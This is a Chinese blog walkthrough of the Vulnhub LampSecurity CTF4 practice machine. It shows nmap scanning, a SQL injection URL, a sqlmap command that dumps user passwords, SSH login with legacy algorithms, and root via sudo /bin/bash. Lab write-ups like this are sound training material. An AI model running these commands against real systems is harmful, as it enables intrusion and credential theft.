freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub靶机实操笔记-LampSecurity-CTF4
2023-06-18 18:27:05
所属地 北京

一、Namp扫描

1、主机存活判断

sudo nmap -sn 192.168.32.0./24

1687082992_648ed7f0e32973c413148.png!small?1687082993731

2、快速扫描

以不低于1w的速度快速扫描端口

sudo nmap --min-rate 10000 -p- 192.168.32.141

--min-rate          #以不低于xxx的速度扫描
-p-                 #全端口

1687083027_648ed813036389c71fd6f.png!small?1687083027831

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,80,25,631 172.16.200.130

-sT               #以TCP协议进行扫描
-sV               #服务的版本号
-O                #服务器系统
-p                #指定端口

1687083048_648ed828a64296df895d1.png!small?1687083049520

4、UDP扫描

sudo nmap -sU -p22,25,80,631 192.168.32.141

1687083069_648ed83dbd15cae6f4373.png!small?1687083070547

5、Namp的POC扫描

通过脚本扫描提示有SQL注入漏洞

sudo nmap --script=vuln -p22,25,80,631 192.168.32.141

1687083089_648ed8514502f6438f211.png!small?1687083090412

1687083109_648ed865dfaf00523aae1.png!small?1687083110834

二、SQL注入

复制脚本提示的URL访问查看

http://192.168.32.141:80/?title=Blog&id=2%27%20OR%20sqlspider&page=blog

通过输入单引号发现疑似存在SQL注入漏洞

1687083130_648ed87ac625e8ce03c2a.png!small?1687083131542

使用sqlmap成功发现注入点

1687083168_648ed8a0636b81464ca70.png!small?1687083169680

通过数据库获得6个用户名和密码

sudo sqlmap -u 'http://192.168.32.141/?title=Blog&id=2%20&page=blog' -p id --dbms mysql --batch -D ehks -T user -C user_name,user_pass --dump

1687083188_648ed8b4cc436c7f879ea.png!small?1687083189819

三、SSH登陆的小状况

有账户名和密码直接尝试ssh登陆系统,这边发现登陆ssh的时候出现一点点的意外状况。不同ssh的应用版本和其配置的协议多少存在一些差别,配置文件的写法会有一些差别。

提示没有key exchange,这边要使用KexAlgorithms再接上我们缺少的

sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.32.141  

1687083212_648ed8cccf5aab3f76e80.png!small?1687083213752

再次执行提示我们key的类型没有找到,此时使用HostKeyAlgorithms指定具体的算法,经过ssh的小插曲配置调整后,发现第一个账户密码竟成功登陆

sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss  -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.32.141  

1687083227_648ed8db736d66acfc94b.png!small?1687083228645

四、内网提权

1、系统详情

uname -a   #显示系统名、节点名称、操作系统的发行版号、内核版本等等

1687083262_648ed8feb3ddc8b39deb9.png!small?1687083263419

2、查看当前系统权限

sudo -l                   #查看用户权限
sudo /bin/bash            #新启动一个新的bash线程命令

1687083276_648ed90c0f198957e7cb3.png!small?1687083276849

1687083288_648ed918058abda85f456.png!small?1687083288696

3、查看定时任务

cat /etc/crontab    #较为常用
cat /etc/cron.d     #比较少用

1687083346_648ed9526fe79a80a2e65.png!small?1687083347255

五、靶场下载链接

https://download.vulnhub.com/lampsecurity/ctf4.zip

# 提权漏洞 # vulnhub靶机 # linux提权 # 靶场平台 # 靶场攻关
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录